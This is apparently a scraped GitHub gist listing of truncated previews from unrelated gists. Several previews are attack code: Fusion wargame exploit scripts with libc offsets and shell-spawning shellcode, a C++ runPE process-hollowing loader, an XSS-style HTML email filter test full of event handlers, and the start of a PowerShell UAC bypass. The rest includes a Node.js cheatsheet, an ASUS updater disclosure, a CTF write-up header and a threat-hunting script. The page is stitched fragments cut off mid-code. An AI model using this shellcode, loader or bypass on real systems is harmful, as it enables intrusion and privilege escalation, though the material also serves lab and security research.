Toufik Airane toufik-airane

@soez
soez / fusion-level05.py
Created September 27, 2014 03:05
fusion-level05.py
from amnesia import *
from struct import pack, unpack
import time, sys
s = amnesiaSocket("127.0.0.1", 20005)
print s.readLine()
# base libc.so.6 0xb7e5f000
base = 0xb7e5f000
shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8" # dup2 by Nox & soez
@soez
soez / 2fusion-level05.py
Created December 7, 2014 21:55
2fusion-level05.py
# -*- encoding: utf-8 -*-
from amnesia import *
from struct import pack, unpack
import time, sys
##################################################################################
# Exploit configuration parameters.. Must be adjusted to the target system and app.
OFFSET_SAVED_EIP = 0xb7ffc848
PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL = 2
OFFSET_TO_LIBC = 0x1a9000
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
class runPE{
public:
void run(LPSTR szFilePath, PVOID pFile)
{
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
// Node.js CheatSheet.
// Download the Node.js source code or a pre-built installer for your platform, and start developing today.
// Download: http://nodejs.org/download/
// More: http://nodejs.org/api/all.html
// 0. Synopsis.
// http://nodejs.org/api/synopsis.html
from amnesia import *
from struct import pack, unpack
import time
p = lambda x: pack("<L", x)
u = lambda x: unpack('<L', x)[0]
shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8"
shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73"
shellcode += "\x68\x68\x2f\x2f\x62\x69\x89\xe3"
@indrora
indrora / 00readme.md
Last active November 12, 2021 07:24
DeadUpdate: Kickin' it bigtime.

... my first disclosure. Man, it feels weird doing this.

update 6/6/16 I would like to stress something: I'm not saying "Don't buy an ASUS device" -- I see a lot of people who want to lambaste ASUS for this and boycott their hardware. This isn't what I want people to be doing by any stretch. Stupidly, I like the ASUS hardware I have (it's nice for the price) and I would rather see pressure on ASUS as an OEM to stop shipping "value added software" to consumers; if you want to help Microsoft in pushing this mentality, go buy a signature machine from them. Microsoft provides support, but also only ships Windows and a few select utilities that are essential to the functioning of the system (think: Radeon/Optimus and nVidia control panels) and falls heavily on the hardware makers (ATI, nVidia, Intel) to provide support for the hardware.

Consider an ASUS device all you want. Start putting pressure on Microsoft that consumers want bloat-free devices and start voting with your money. Microsoft's store

@stypr
stypr / README.md
Last active June 22, 2019 15:47
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

@rwestergren
rwestergren / html_test.html
Created December 13, 2016 16:34
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active July 1, 2024 08:32
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager